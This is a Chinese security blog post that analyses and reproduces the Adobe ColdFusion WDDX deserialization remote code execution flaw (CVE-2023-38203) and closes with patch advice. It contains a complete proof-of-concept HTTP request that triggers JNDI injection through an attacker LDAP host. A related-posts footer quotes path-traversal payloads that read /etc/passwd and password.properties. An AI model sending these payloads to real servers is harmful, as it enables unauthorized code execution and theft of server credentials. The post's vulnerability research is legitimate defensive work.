漏洞复现-Adobe ColdFusion 远程代码执行漏洞(CVE-2023-38203)

于 2024-08-11 20:59:12 发布
阅读量1k 收藏 9
点赞数 14
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuandao_ahfengren/article/details/141111696
版权

1.漏洞描述

Adobe ColdFusion是一种服务器端的Web应用开发平台。它由Adobe Systems开发,用于创建动态的、交互式的Web应用程序和网站。

Adobe ColdFusion在2018u17及之前版本、2021u7及之前版本和2023u1及之前版本中存在任意代码执行漏洞。该漏洞是由于反序列化不受信任数据漏洞的影响,可能会导致任意代码执行。攻击者可利用该漏洞对目标有针对性的发起攻击,危害站点系统安全。

2.影响版本

ColdFusion <=2018u17

ColdFusion <=2021u7

ColdFusion <=2023u1

3.影响范围

4.漏洞分析

我们通过git diff看到coldfusion.wddx.DeserializerWorker.java文件

这是一个XML 类型的WDDX数据包解码器。在startElement方法中DeserializerWorker,我们注意到新添加的验证是通过validateWddxFilter() struct参数执行的。

WDDX数据包的解析

<wddxPacket version='1.0'><header/><data><struct type='className'><var name='prop_name'><string>prop_value</string></var></struct></data></wddxPacket>

经过调试后发现Java 反射在某些代码块中被广泛使用,这表明用户输入将经历反射调用。

这是解析过程中有趣部分的代码流程:

 onEndElement() -> getClassBySignature() -> setBeanProperties()

在该方法中,如果 WDDX 数据包的结构元素中提供了 type 属性,则会对该字段onEndElement()执行检查

通过此检查后,将调用getClassbySignature(),它使用反射来获取类实例。类名源自用户控制的输入m_strictType

有了类名后,就可以使用反射来访问类的构造函数,没有参数的构造函数,并实例化类的实例。然后将此实例与用户控制的m_ht字段一起传递给setBeanProperties(),该字段包含WDDX变量。

如果bean有任何setter方法,它将被返回,并最终通过Java Reflections在bean上调用,变量的值是唯一的参数,这些变量的值来自用户控制的WDDX数据包。

在我们通过搜索WddxDeserializer的代码进行分析的过程中,我们发现了一个FilterUtils类的调用。

在GetArgumentCollection方法中使用的。从表单或查询字符串中提取argumentCollection参数。然后检查检索到的输入以确定它是否为JSON类型。如果不是,则使用WDDXDeserialize调用将该值反序列化为WDDX数据包。

在我们的分析中,预授权CFC端点触发对GetArgumentCollection的调用,并最终触发对易受攻击的接收器的调用,即WDDXDeserialize。

/CFDE/adminapi/accessmanager.cfc是预授权有效的cfc端点

我们选择了一个满足指定要求的简单类java.util.Date,我们在请求中创建了一个类似于以下内容的WDDX数据包。

我们能够确认对java.util.Date.setDate(our_input)的调用已成功执行。

我们看看com.sun.rowset.JdbcRowSetImpl类,如果将布尔参数传递给此类的setAutoCommit()方法,它将对dataSourceName执行JNDI查找,该查找可以使用setDataSourceName()方法进行设置。在调用setDataSourceName()之后再调用setAutoCommit()会导致JNDI注入漏洞。需要注意的是,在进行方法调用时,我们处于for循环中,因此我们能够在bean实例上调用多个方法。

我们通过WDDX反序列化升级到JNDI注入。

Poc:

POST /CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/2

Host: localhost

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 266



argumentCollection=<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://attacker:1389/exploit</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>

5.修复建议

目前官方已发布新版已经修复此漏洞,并且为受影响版本发布了补丁,建议用户尽快升级至最新版本。

官方下载地址:

https://helpx.adobe.com/security/products/coldfusion/apsb23-41.html

玄道网安
关注
Adobe ColdFusion 反序列化漏洞复现(CVE-2023-38203
0xSec
01-27 1031
Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767
最新发布
iSee857的博客
08-22 391
漏洞是由于Adobe ColdFusion中getHeartBeat类继承了UDFMethod,并且在getAccess中方法返回3 绕过权限校验导致未授权,未经身份认证的远程攻击者可通过构造恶意请求读取目标服务器上的任意文件,进而泄露敏感信息。从源码上看这个servlet里module可选多个,危害较大的为logging时候的任意文件读取与heap_dump时候的deapdump下载。首先获取access为3的类 绕过权限检测,这里getHeartBeat类恰好为3。
漏洞复现-Adobe ColdFusion 反序列化漏洞CVE-2023-29300)
玄道的网安博客
08-11 1701
对于 ColdFusion 来说,WDDX 中的每个元素都是一个WddxElement,不同的元素对应着不同的Handler处理类,例如标签中的元素与属性将由StringHandler处理,标签会由StructHandler处理。分析findAttribute()方法可知,参数为url.xxx表示从请求的 URL 中获取xxx的参数值,form.yyy表示从上传的表单中获取yyy的参数值。.wddx.DeserializerWorker.java文件中的显着变化。
CVE-2021-21087: Adobe ColdFusion远程代码执行漏洞通告
爱国小白帽
03-24 1173
报告编号:B6-2021-032301 报告来源:360CERT 报告作者:360CERT 更新日期:2021-03-23 0x01漏洞简述 2021年03月23日,360CERT监测发现Adobe官方发布了Adobe ColdFusion的风险通告,漏洞编号为CVE-2021-21087,漏洞等级:严重,漏洞评分:9.8。 Adobe ColdFusion是一个商用的快速应用程序开发平台,ColdFusion经常用在数据驱动的网站及内部网的开发上,但也可以用来生成包括SOAP Web服务及Flash远程.
coldfusion文件读取漏洞CVE-2010-2861)
1stPeak's Blog
07-28 1057
1、直接访问http//your-ip8500/CFIDE/administrator/enter.cfm?/etc/passwd%00en,即可读取文件/etc/passwd。2、读取后台管理员密码http//your-ip8500/CFIDE/administrator/enter.cfm?/lib/password.properties%00en。AdobeColdFusion8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。解密password。...
Adobe ColdFusion 反序列化漏洞复现CVE-2023-29300)
0xSec
08-02 3027
Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4315
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
漏洞分析|Adobe ColdFusion WDDX 序列化漏洞利用
m0_46699477的博客
09-07 510
本文将分享继 CVE-2023-29300 之后的不出网利用方式,提出 C3P0 和 JGroups 两条基于服务错误部署的新利用链。现 Goby 中实现了 C3P0 和 JGroups 利用链的完整利用,完全支持命令执行以及结果回显功能。
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1229
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
【vulhub】Adobe ColdFusion 反序列化漏洞CVE-2017-3066)和CVE-2010-2861文件包含漏洞
qq_45300786的博客
09-13 373
adobe coldfusion特征 1、8500端口 2、如图所示 验证和反弹shell都有 https://idc.wanyunshuju.com/aqld/2076.html
Adobe ColdFusion RCE(CVE-2019-7839) 漏洞分析
晓得哥的博客
08-05 544
作者: Badcode@知道创宇404实验室 日期: 2019/07/09 原文链接:https://paper.seebug.org/999/ 英文版本:https://paper.seebug.org/1000/ 漏洞简介 ​ Adobe ColdFusion 是一个商用的快速开发平台。它可以作为一个开发平台使用,也可以提供Flash远程服务或者作为 Adobe Flex应用的后台服务器 。 ...
Adobe ColdFusion 反序列化漏洞CVE-2017-3066)
EC_Carrot的博客
05-20 675
漏洞背景 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。 影响范围 Adobe ColdFusion (2016 release) Update 3及之前的版本 ColdFusion 11 Update 11及之前的版本 ColdFus
Adoble ColdFusion反序列化漏洞CVE-2017-3066)
Kevin's Blog
01-18 946
文章目录一、介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御 一、介绍 1.1 漏洞介绍   Adoble ColdFusion是一个动态Web服务器,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言。文件以*.cfm为文件名,在ColdFusion专用的应用服务器环境下运行。   低版本的Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服 务。 1.2 影响版本 Ad
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)
shierbai的博客
06-21 337
locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`locale=../../../../../../../lib/password.properties%00en`搭建环境后,访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
Adobe ColdFusion 文件读取漏洞CVE-2010-2861)
时光凉春衫薄的博客
12-06 317
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 产品样子: 漏洞复现 登录界面?后边locale=../../../../../../../../../../etc/passwd%00en即可 读取后台用户密码 locale=../../..
10 - vulhub - Adobe ColdFusion 反序列化漏洞 (CVE-2024-3066)
2301_78416543的博客
04-06 596
① 2000多本Python电子书(主流和经典的书籍应该都有了)② Python标准库资料(最全中文版)③ 项目源码(四五十个有趣且经典的练手项目及源码)④ Python基础入门、爬虫、web开发、大数据分析方面的视频(适合小白学习)⑤ Python学习路线图(告别不入流的学习)
漏洞分析|Adobe ColdFusion 序列化漏洞CVE-2023-29300)
m0_46699477的博客
08-02 2005
通过研究 CVE-2023-29300,我们了解了 Adobe ColdFusion 产品的基本工作原理,其不安全的 WDDX 序列化实现将产生可利用的漏洞。同时,我们详细分析了通过 argumentCollection 参数传入 payload 的完整调用路径,以及为何需要传入看似与利用无关的 method 参数。在此基础上,我们探索了利用的新方向,在这个过程中也踩了不少坑。阅读本篇文章后,大家在复现漏洞以及在将来需要研究此产品时,就可以少走一些弯路了,后续有机会的话,会进一步分享研究成果。
Adobe ColdFusionCVE-2010-2861)文件读取漏洞复现
qq_44504968的博客
09-23 1601
Adobe ColdFusion文件读取漏洞CVE-2010-2861)漏洞原理实验环境漏洞环境漏洞复现 漏洞原理 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。 Adobe ColdFusion 8、9版本中
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值